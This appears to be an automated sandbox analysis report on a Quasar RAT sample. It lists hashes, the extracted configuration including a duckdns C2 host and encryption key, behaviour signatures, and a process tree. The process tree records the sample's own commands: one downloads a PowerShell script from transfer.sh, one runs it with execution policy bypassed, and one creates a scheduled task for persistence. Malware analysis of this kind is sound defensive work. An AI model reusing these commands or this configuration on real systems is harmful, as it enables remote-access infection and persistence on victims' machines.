Analysis

  • max time kernel
    143s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17/01/2023, 08:26

General

  • Target

    {437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe

  • Size

    547KB

  • MD5

    b0ab211e83a23d58e1322e4d2d6f0a96

  • SHA1

    d568fbcd41e30651cc80ba8a5e9eeab637a99f9e

  • SHA256

    3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5

  • SHA512

    4a54251fbf23fe3d0e96fcf8d3363e917921644a178387b619367338faa1884134639dd696d55a5a9f06cf167f128d599cc57fb62dba603afc4ebb287d22204d

  • SSDEEP

    3072:SvGyYiSDnt1G5GWp1icKAArDZz4N9GhbkrNEk184:W4wp0yN90QEg

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

Office04

C2

ghcc.duckdns.org:4782

Mutex

a9c03eb7-f3c1-4b9e-a4f7-1962d17a793b

Attributes
  • encryption_key

    B0326395AC2D48856CAE22978A087DF5DCF5816D

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Update

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe
    "C:\Users\Admin\AppData\Local\Temp\{437AE0B7-6837-41A9-9B2C-9199409B23EF}.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:4644
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c new.vbs
      2⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:4112
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\new.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:3752
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2132
          • C:\Windows\system32\cmd.exe
            cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4320
            • C:\Windows\system32\curl.exe
              curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
              6⤵
                PID:1852
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:364
            • C:\Windows\system32\cmd.exe
              cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:632
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
                6⤵
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3572
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  7⤵
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:2880
                  • C:\Windows\SysWOW64\schtasks.exe
                    "schtasks" /create /tn "Update" /sc ONLOGON /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" /rl HIGHEST /f
                    8⤵
                    • Creates scheduled task(s)
                    PID:1952

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\new.vbs

      Filesize

      300.0MB

      MD5

      f7e7099eea0cc25fc49d04cd53c573a1

      SHA1

      3abac9f3f93b0f87ef432d70c40e8ab865157770

      SHA256

      b7f331e83a80b15cc4537324bde827ac9b2ecb990150db4d00d84ee2560cf5be

      SHA512

      c19ddc5e41ed6d485f5df47996f34ff326a782e909bffaa8aa31a3f72fddb33cc7e3709e0cc44b2078668dc83297b42bb3157d6d000a9323ffca6303cd43f074

    • C:\Users\Admin\AppData\Roaming\rr.ps1

      Filesize

      5.1MB

      MD5

      970aca768e68faa580f758a1a379686b

      SHA1

      6a93921485cbd83382eb5a47315b1f0a67bcf684

      SHA256

      6c1e62385d660ca43e024d461154fbb4805e429cdf7850d19510d7f69533739e

      SHA512

      66dd4c5b17978e68c8e0cd2bc4fd35ba5d519447ff34259ec77d11e4253cbfc9955a43915ed3c343f41dc04d97f4302ab6922a823b0e0da44e8893d29ec7cf0f

    • memory/2880-147-0x00000000055C0000-0x0000000005B64000-memory.dmp

      Filesize

      5.6MB

    • memory/2880-148-0x00000000050D0000-0x0000000005162000-memory.dmp

      Filesize

      584KB

    • memory/2880-154-0x0000000007570000-0x00000000075D6000-memory.dmp

      Filesize

      408KB

    • memory/2880-153-0x0000000006420000-0x00000000064D2000-memory.dmp

      Filesize

      712KB

    • memory/2880-152-0x0000000006130000-0x0000000006180000-memory.dmp

      Filesize

      320KB

    • memory/2880-144-0x0000000000400000-0x0000000000484000-memory.dmp

      Filesize

      528KB

    • memory/2880-151-0x0000000006660000-0x0000000006C78000-memory.dmp

      Filesize

      6.1MB

    • memory/2880-149-0x0000000005080000-0x000000000508A000-memory.dmp

      Filesize

      40KB

    • memory/3572-146-0x00007FFBAD7F0000-0x00007FFBAE2B1000-memory.dmp

      Filesize

      10.8MB

    • memory/3572-143-0x00007FFBAD7F0000-0x00007FFBAE2B1000-memory.dmp

      Filesize

      10.8MB

    • memory/3572-141-0x000001DAF4570000-0x000001DAF4592000-memory.dmp

      Filesize

      136KB